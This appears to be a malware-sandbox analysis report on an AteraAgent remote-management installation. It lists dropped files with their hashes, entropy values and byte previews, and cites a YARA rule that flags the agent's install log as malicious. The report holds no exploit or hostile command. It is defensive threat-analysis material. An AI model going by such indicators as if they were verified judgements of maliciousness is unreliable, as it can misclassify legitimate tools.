                                                                                                                                                                                                                                        MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                        SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                        SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                        SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471
                                                                                                                                                                                                                                        Entropy (8bit):7.15290820119303
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JyYOjMt5GLsHjcHYixuRLQedEd3FOVHDE+U3p0P:JRO4tILs4duZEbOx1U3p+
                                                                                                                                                                                                                                        MD5:4C990137B89FAFD01ECAE5016D2F3CFF
                                                                                                                                                                                                                                        SHA1:0965AB0ECF0AA52E373C181C5B9A443657C53E29
                                                                                                                                                                                                                                        SHA-256:62F399068685A22C5899972BA8A0B0D70499C75C66B4313CB748452C76EB0308
                                                                                                                                                                                                                                        SHA-512:A61AF1B036B455A9F8A30436A37C9FCAFCF314C86EDCD3772A047C78C9DAB536849C14AF28648974A9ABCB2788D56BBF5DDD9EB8E035688791CCA36DCB9623E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.552074964556022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5o6Tq91IX5h44TUqrlPdU/uRIFBDNAHrrsAqldCcE9WPNXkPxj/Zf:5uIoqro/uuBR6rsAYE9COxj/J
                                                                                                                                                                                                                                        MD5:E00FF3213C8F42F9482FC7DD36AEE060
                                                                                                                                                                                                                                        SHA1:388BCAC84BAECF2E39C97858BDCD40FFF16CC7DB
                                                                                                                                                                                                                                        SHA-256:9C9637A1B89B95A2CEC6E6478414BBCC8790DDC2AA8065874F3BA81FF89F8272
                                                                                                                                                                                                                                        SHA-512:37594DE9CF6B0ABE66BEB45E754203957C92F31696BA7939E46A9E1ACB5EC271740804B91F49C319053AEFC1639A253E70C42090A80E7AB1B4F57E1EFB857965
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):737
                                                                                                                                                                                                                                        Entropy (8bit):7.511055585378104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:yeRLaWQMnFQlRNWFfBqDm6YFC15H3giR2KO2hNbJxFEtqcQzovCQYmBQzM47+h:y2GWnSNWtouoH3S2btxOZQUvCQQh+
                                                                                                                                                                                                                                        MD5:6DF9DD91D83A951DF95CE3E1A13E5212
                                                                                                                                                                                                                                        SHA1:0D324D6A33DAB091E0712D8D088206984D5BB39B
                                                                                                                                                                                                                                        SHA-256:35A90524E9C17EAA14B9B6810749D9B61A8FB3A5DAD0ABF8FE392B32DDC80642
                                                                                                                                                                                                                                        SHA-512:2E9A4CDEA7875E34AB13E1675795B527851D6E38345E40EF55B2F44E11486E73805DD25B92C78F82DB40562684F3B6273E418C24B0EB8D27D55265F8882DE343
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.552295515462603
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                                                                                                        MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                                                                                                        SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                                                                                                        SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                                                                                                        SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                        Entropy (8bit):3.453652333040854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKdQ89/sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:im/HkPlE99SCQl2DUevat
                                                                                                                                                                                                                                        MD5:EB1E9BB3CFF20C1B0C49AB7805235D6E
                                                                                                                                                                                                                                        SHA1:50758356E89C76FC821D0094A9BCEFA6CB54F82A
                                                                                                                                                                                                                                        SHA-256:CC834DA9D54538F7DDF6B6FBC4A7E7EC802F96AE80A2B226C11A85A99E994AEE
                                                                                                                                                                                                                                        SHA-512:F893802C10F3A715E5DA58BE0BC623E09D16065DD9F5B4D82190D22204042C9BD83554C4774E710295026DF924EC091CC48D3DE246A7CE812E78764EDC037116
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ................(.................................................|.d... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                                        Entropy (8bit):3.9736224693495865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKOfmd1I88HF7rXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:2OW79mxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                        MD5:657125401519AF99C01F55404797DEA2
                                                                                                                                                                                                                                        SHA1:9C3BBC030A7D0BCD072865806492B98A8365326C
                                                                                                                                                                                                                                        SHA-256:9B23ADC2F301F6B119D6BAD331B6BF74A3A68C812817344B7EE8C0289D238CAD
                                                                                                                                                                                                                                        SHA-512:9932336DC11F65D26F6F39ABC379BFBD7D8416AEA422F45BBB4AAE2E57562ADE3EA585F9BF217163626C91DE30FF4B9F75C6B52D8A6A880AE04773E3CFBD773C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ...........(....(................jr/#.....VX......................VX.... .........0j.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK1N/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:nkDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                        MD5:830039A3024AC992DE82D72A40978CA0
                                                                                                                                                                                                                                        SHA1:28CD54BBD1B6B520CD81A8C24585B0D50B3B59C2
                                                                                                                                                                                                                                        SHA-256:0597671793A93BBCA7AFFBB320737766146F63ED86104B1D16B7EF0CCB3A65F5
                                                                                                                                                                                                                                        SHA-512:A56BBDFCBEE00C4D8971430CEE4F541CCE7F43909EB687BEE0338408A35FF1EBBC3F05B5A9A51918DA62AFBE28AD9EAF220B224161BFE1392997D0B856B8FF71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ................(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):404
                                                                                                                                                                                                                                        Entropy (8bit):4.020054932007164
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK3VpW04Wc1qzFiQlfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+Kc:NpikBlmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                        MD5:704646AA8C22B37FC650673CEE244AC6
                                                                                                                                                                                                                                        SHA1:592BD3EEA795B05E0935BBFF19ECEEE0765262C6
                                                                                                                                                                                                                                        SHA-256:7F3214CA7D846FE0E7A13AA87CCAFEEC78555F25B08808EB7490184B7109769D
                                                                                                                                                                                                                                        SHA-512:BA99654B92E80F7EE8B0A0CB6A7918AEEF10B94633D53963FD036E9AEC7A9FF3818906BE655D74F53EE16926CD1085C4E2B738D1AE53E8BB6A3E548847C02DEE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .... ...*+#;....(..................n?......5.......................5.... ..........L.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):248
                                                                                                                                                                                                                                        Entropy (8bit):2.9770047449304404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:kkFklke2jl1fllXlE/9XlkDxtINRR8WXdA31y+NW0y1YbXKw+l1M7HlYIkWXalWt:kKlI1koFAUSW0PTKDXM+I+0
                                                                                                                                                                                                                                        MD5:67A4ABAC2F8BE1B95A71945EC565D36D
                                                                                                                                                                                                                                        SHA1:2671E1767169D03127BBCB8974756716B11F050B
                                                                                                                                                                                                                                        SHA-256:7970962055B7631410E2A4AB0C949D9FB1617ECA701C49445E3901520AEAC1BC
                                                                                                                                                                                                                                        SHA-512:44267A925FF1A3F618AACF2274904AE227C0D8A7AF1E7220CDDFC06E926B3A18F5BB5DB8E0ABAD033DA4031000086F369A745B533142AC3D676F3239F03751D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....f.....';....(....................................................... ........X2bO... ...................h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.l...".6.6.f.c.7.4.7.0.-.2.e.1."...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                        Entropy (8bit):3.206650934253046
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .........}".....(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                        Entropy (8bit):4.006856445971696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....(......:....(..................xh....].......................]...... ..........d.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                        Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....l.....(.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1944
                                                                                                                                                                                                                                        Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1983
                                                                                                                                                                                                                                        Entropy (8bit):5.345248756179348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runtime\2702
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1933
                                                                                                                                                                                                                                        Entropy (8bit):5.355086078533374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):3043
                                                                                                                                                                                                                                        Entropy (8bit):5.361093730986187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1968
                                                                                                                                                                                                                                        Entropy (8bit):5.358970550932517
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT44HKmHKe6+JHxLHqHvHlu:iqbYqGSI6oPtzHeqKk+qZ44qmq1IRLK4
                                                                                                                                                                                                                                        MD5:C09FFFFF02DC01F97E0F663546856019
                                                                                                                                                                                                                                        SHA1:1D6A7F75E657912BD3A11A99B914C6EE55893A1F
                                                                                                                                                                                                                                        SHA-256:90EC1BADD918380F4C730DC3FBA25DFBD404BFCAD6E7C9D4B256416E79CEF1D8
                                                                                                                                                                                                                                        SHA-512:4DD854F4E833CB55517A7E42FC325B8B20588FDEB87E11F1F764F83E97E4350E30198AB873C5722B0FE42B6FDAD32F0448607CC8F138BBEB8184D3955DC3630C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
